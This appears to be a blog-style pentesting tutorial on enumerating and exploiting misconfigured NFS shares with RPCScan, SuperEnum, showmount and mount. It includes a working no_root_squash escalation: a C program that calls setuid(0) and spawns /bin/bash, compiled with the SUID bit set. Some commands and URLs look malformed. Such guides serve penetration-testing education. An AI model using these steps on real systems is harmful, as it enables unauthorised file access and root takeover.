Master NFS Enumeration with RPCScan & SuperEnum | Ultimate Bug Bounty & Pentesting Guide!

Network File System (NFS) is a widely used protocol that allows remote file sharing between systems. However, misconfigurations in NFS can expose sensitive data, making it a prime target for penetration testers and bug bounty hunters. In this guide, we’ll dive deep into NFS enumeration using RPCScan and SuperEnum, two powerful tools that can help uncover vulnerabilities in NFS implementations.

NFS enables users to mount remote file systems as if they were local. When improperly configured, it can lead to:

Unauthorized file accessPrivilege escalationData leakageInsecure exports: Sharing directories without proper restrictions.No_root_squash enabled: Allowing root access to remote users.Weak authentication: Lack of user authentication mechanisms.

RPCScan is a powerful tool used to enumerate RPC services, including NFS.

sudo apt update && sudo apt install rpcbind nfs-common -y
git clone https://github.com/superuserRPCScan.git
cd RPCScan
chmod +x rpcscan.sh

Use RPCScan to detect NFS-related services on a target:

./rpcscan.sh -H <target-ip>

Output:

Port 111: RPCBIND running
Port 2049: NFS Service detected

If NFS is running, we can proceed with enumeration using showmount:

showmount -e <target-ip>

This reveals the exported directories.

SuperEnum is an advanced enumeration script that automates multiple reconnaissance steps.

git clone https://github.com/SuperEnum/SuperEnum.git
cd SuperEnum
chmod +x superenum.sh./superenum.sh -t <target-ip> -m nfs

This will: ✅ Detect exposed NFS shares ✅ Attempt to mount shares anonymously ✅ Check for writable directories

If an NFS share is accessible, we can mount it locally:

mkdir /mnt/nfs
sudo mount -t nfs <target-ip>:/exported_directory /mnt/nfs
ls -lah /mnt/nfs

This allows us to browse and extract sensitive files.

If no_root_squash is enabled, an attacker can create SUID binaries to escalate privileges:

cd /mnt/nfs
echo 'int main() { setuid(0); system("/bin/bash"); }' > exploit.c
gcc exploit.c -o exploit
chmod +s exploit

Once executed on the target machine, it grants root access.

To secure NFS servers:

Restrict exports using /etc/exports/secure_data 192.168.1.0/24(rw,root_squash,no_subtree_check)Use authentication mechanisms like Kerberos.Regularly monitor access logs.

Mastering NFS enumeration with RPCScan and SuperEnum can give you an edge in bug bounty and penetration testing. By identifying misconfigurations, you can help secure organizations and uncover critical vulnerabilities.

💬 Have any experiences or tips to share? Drop a comment below!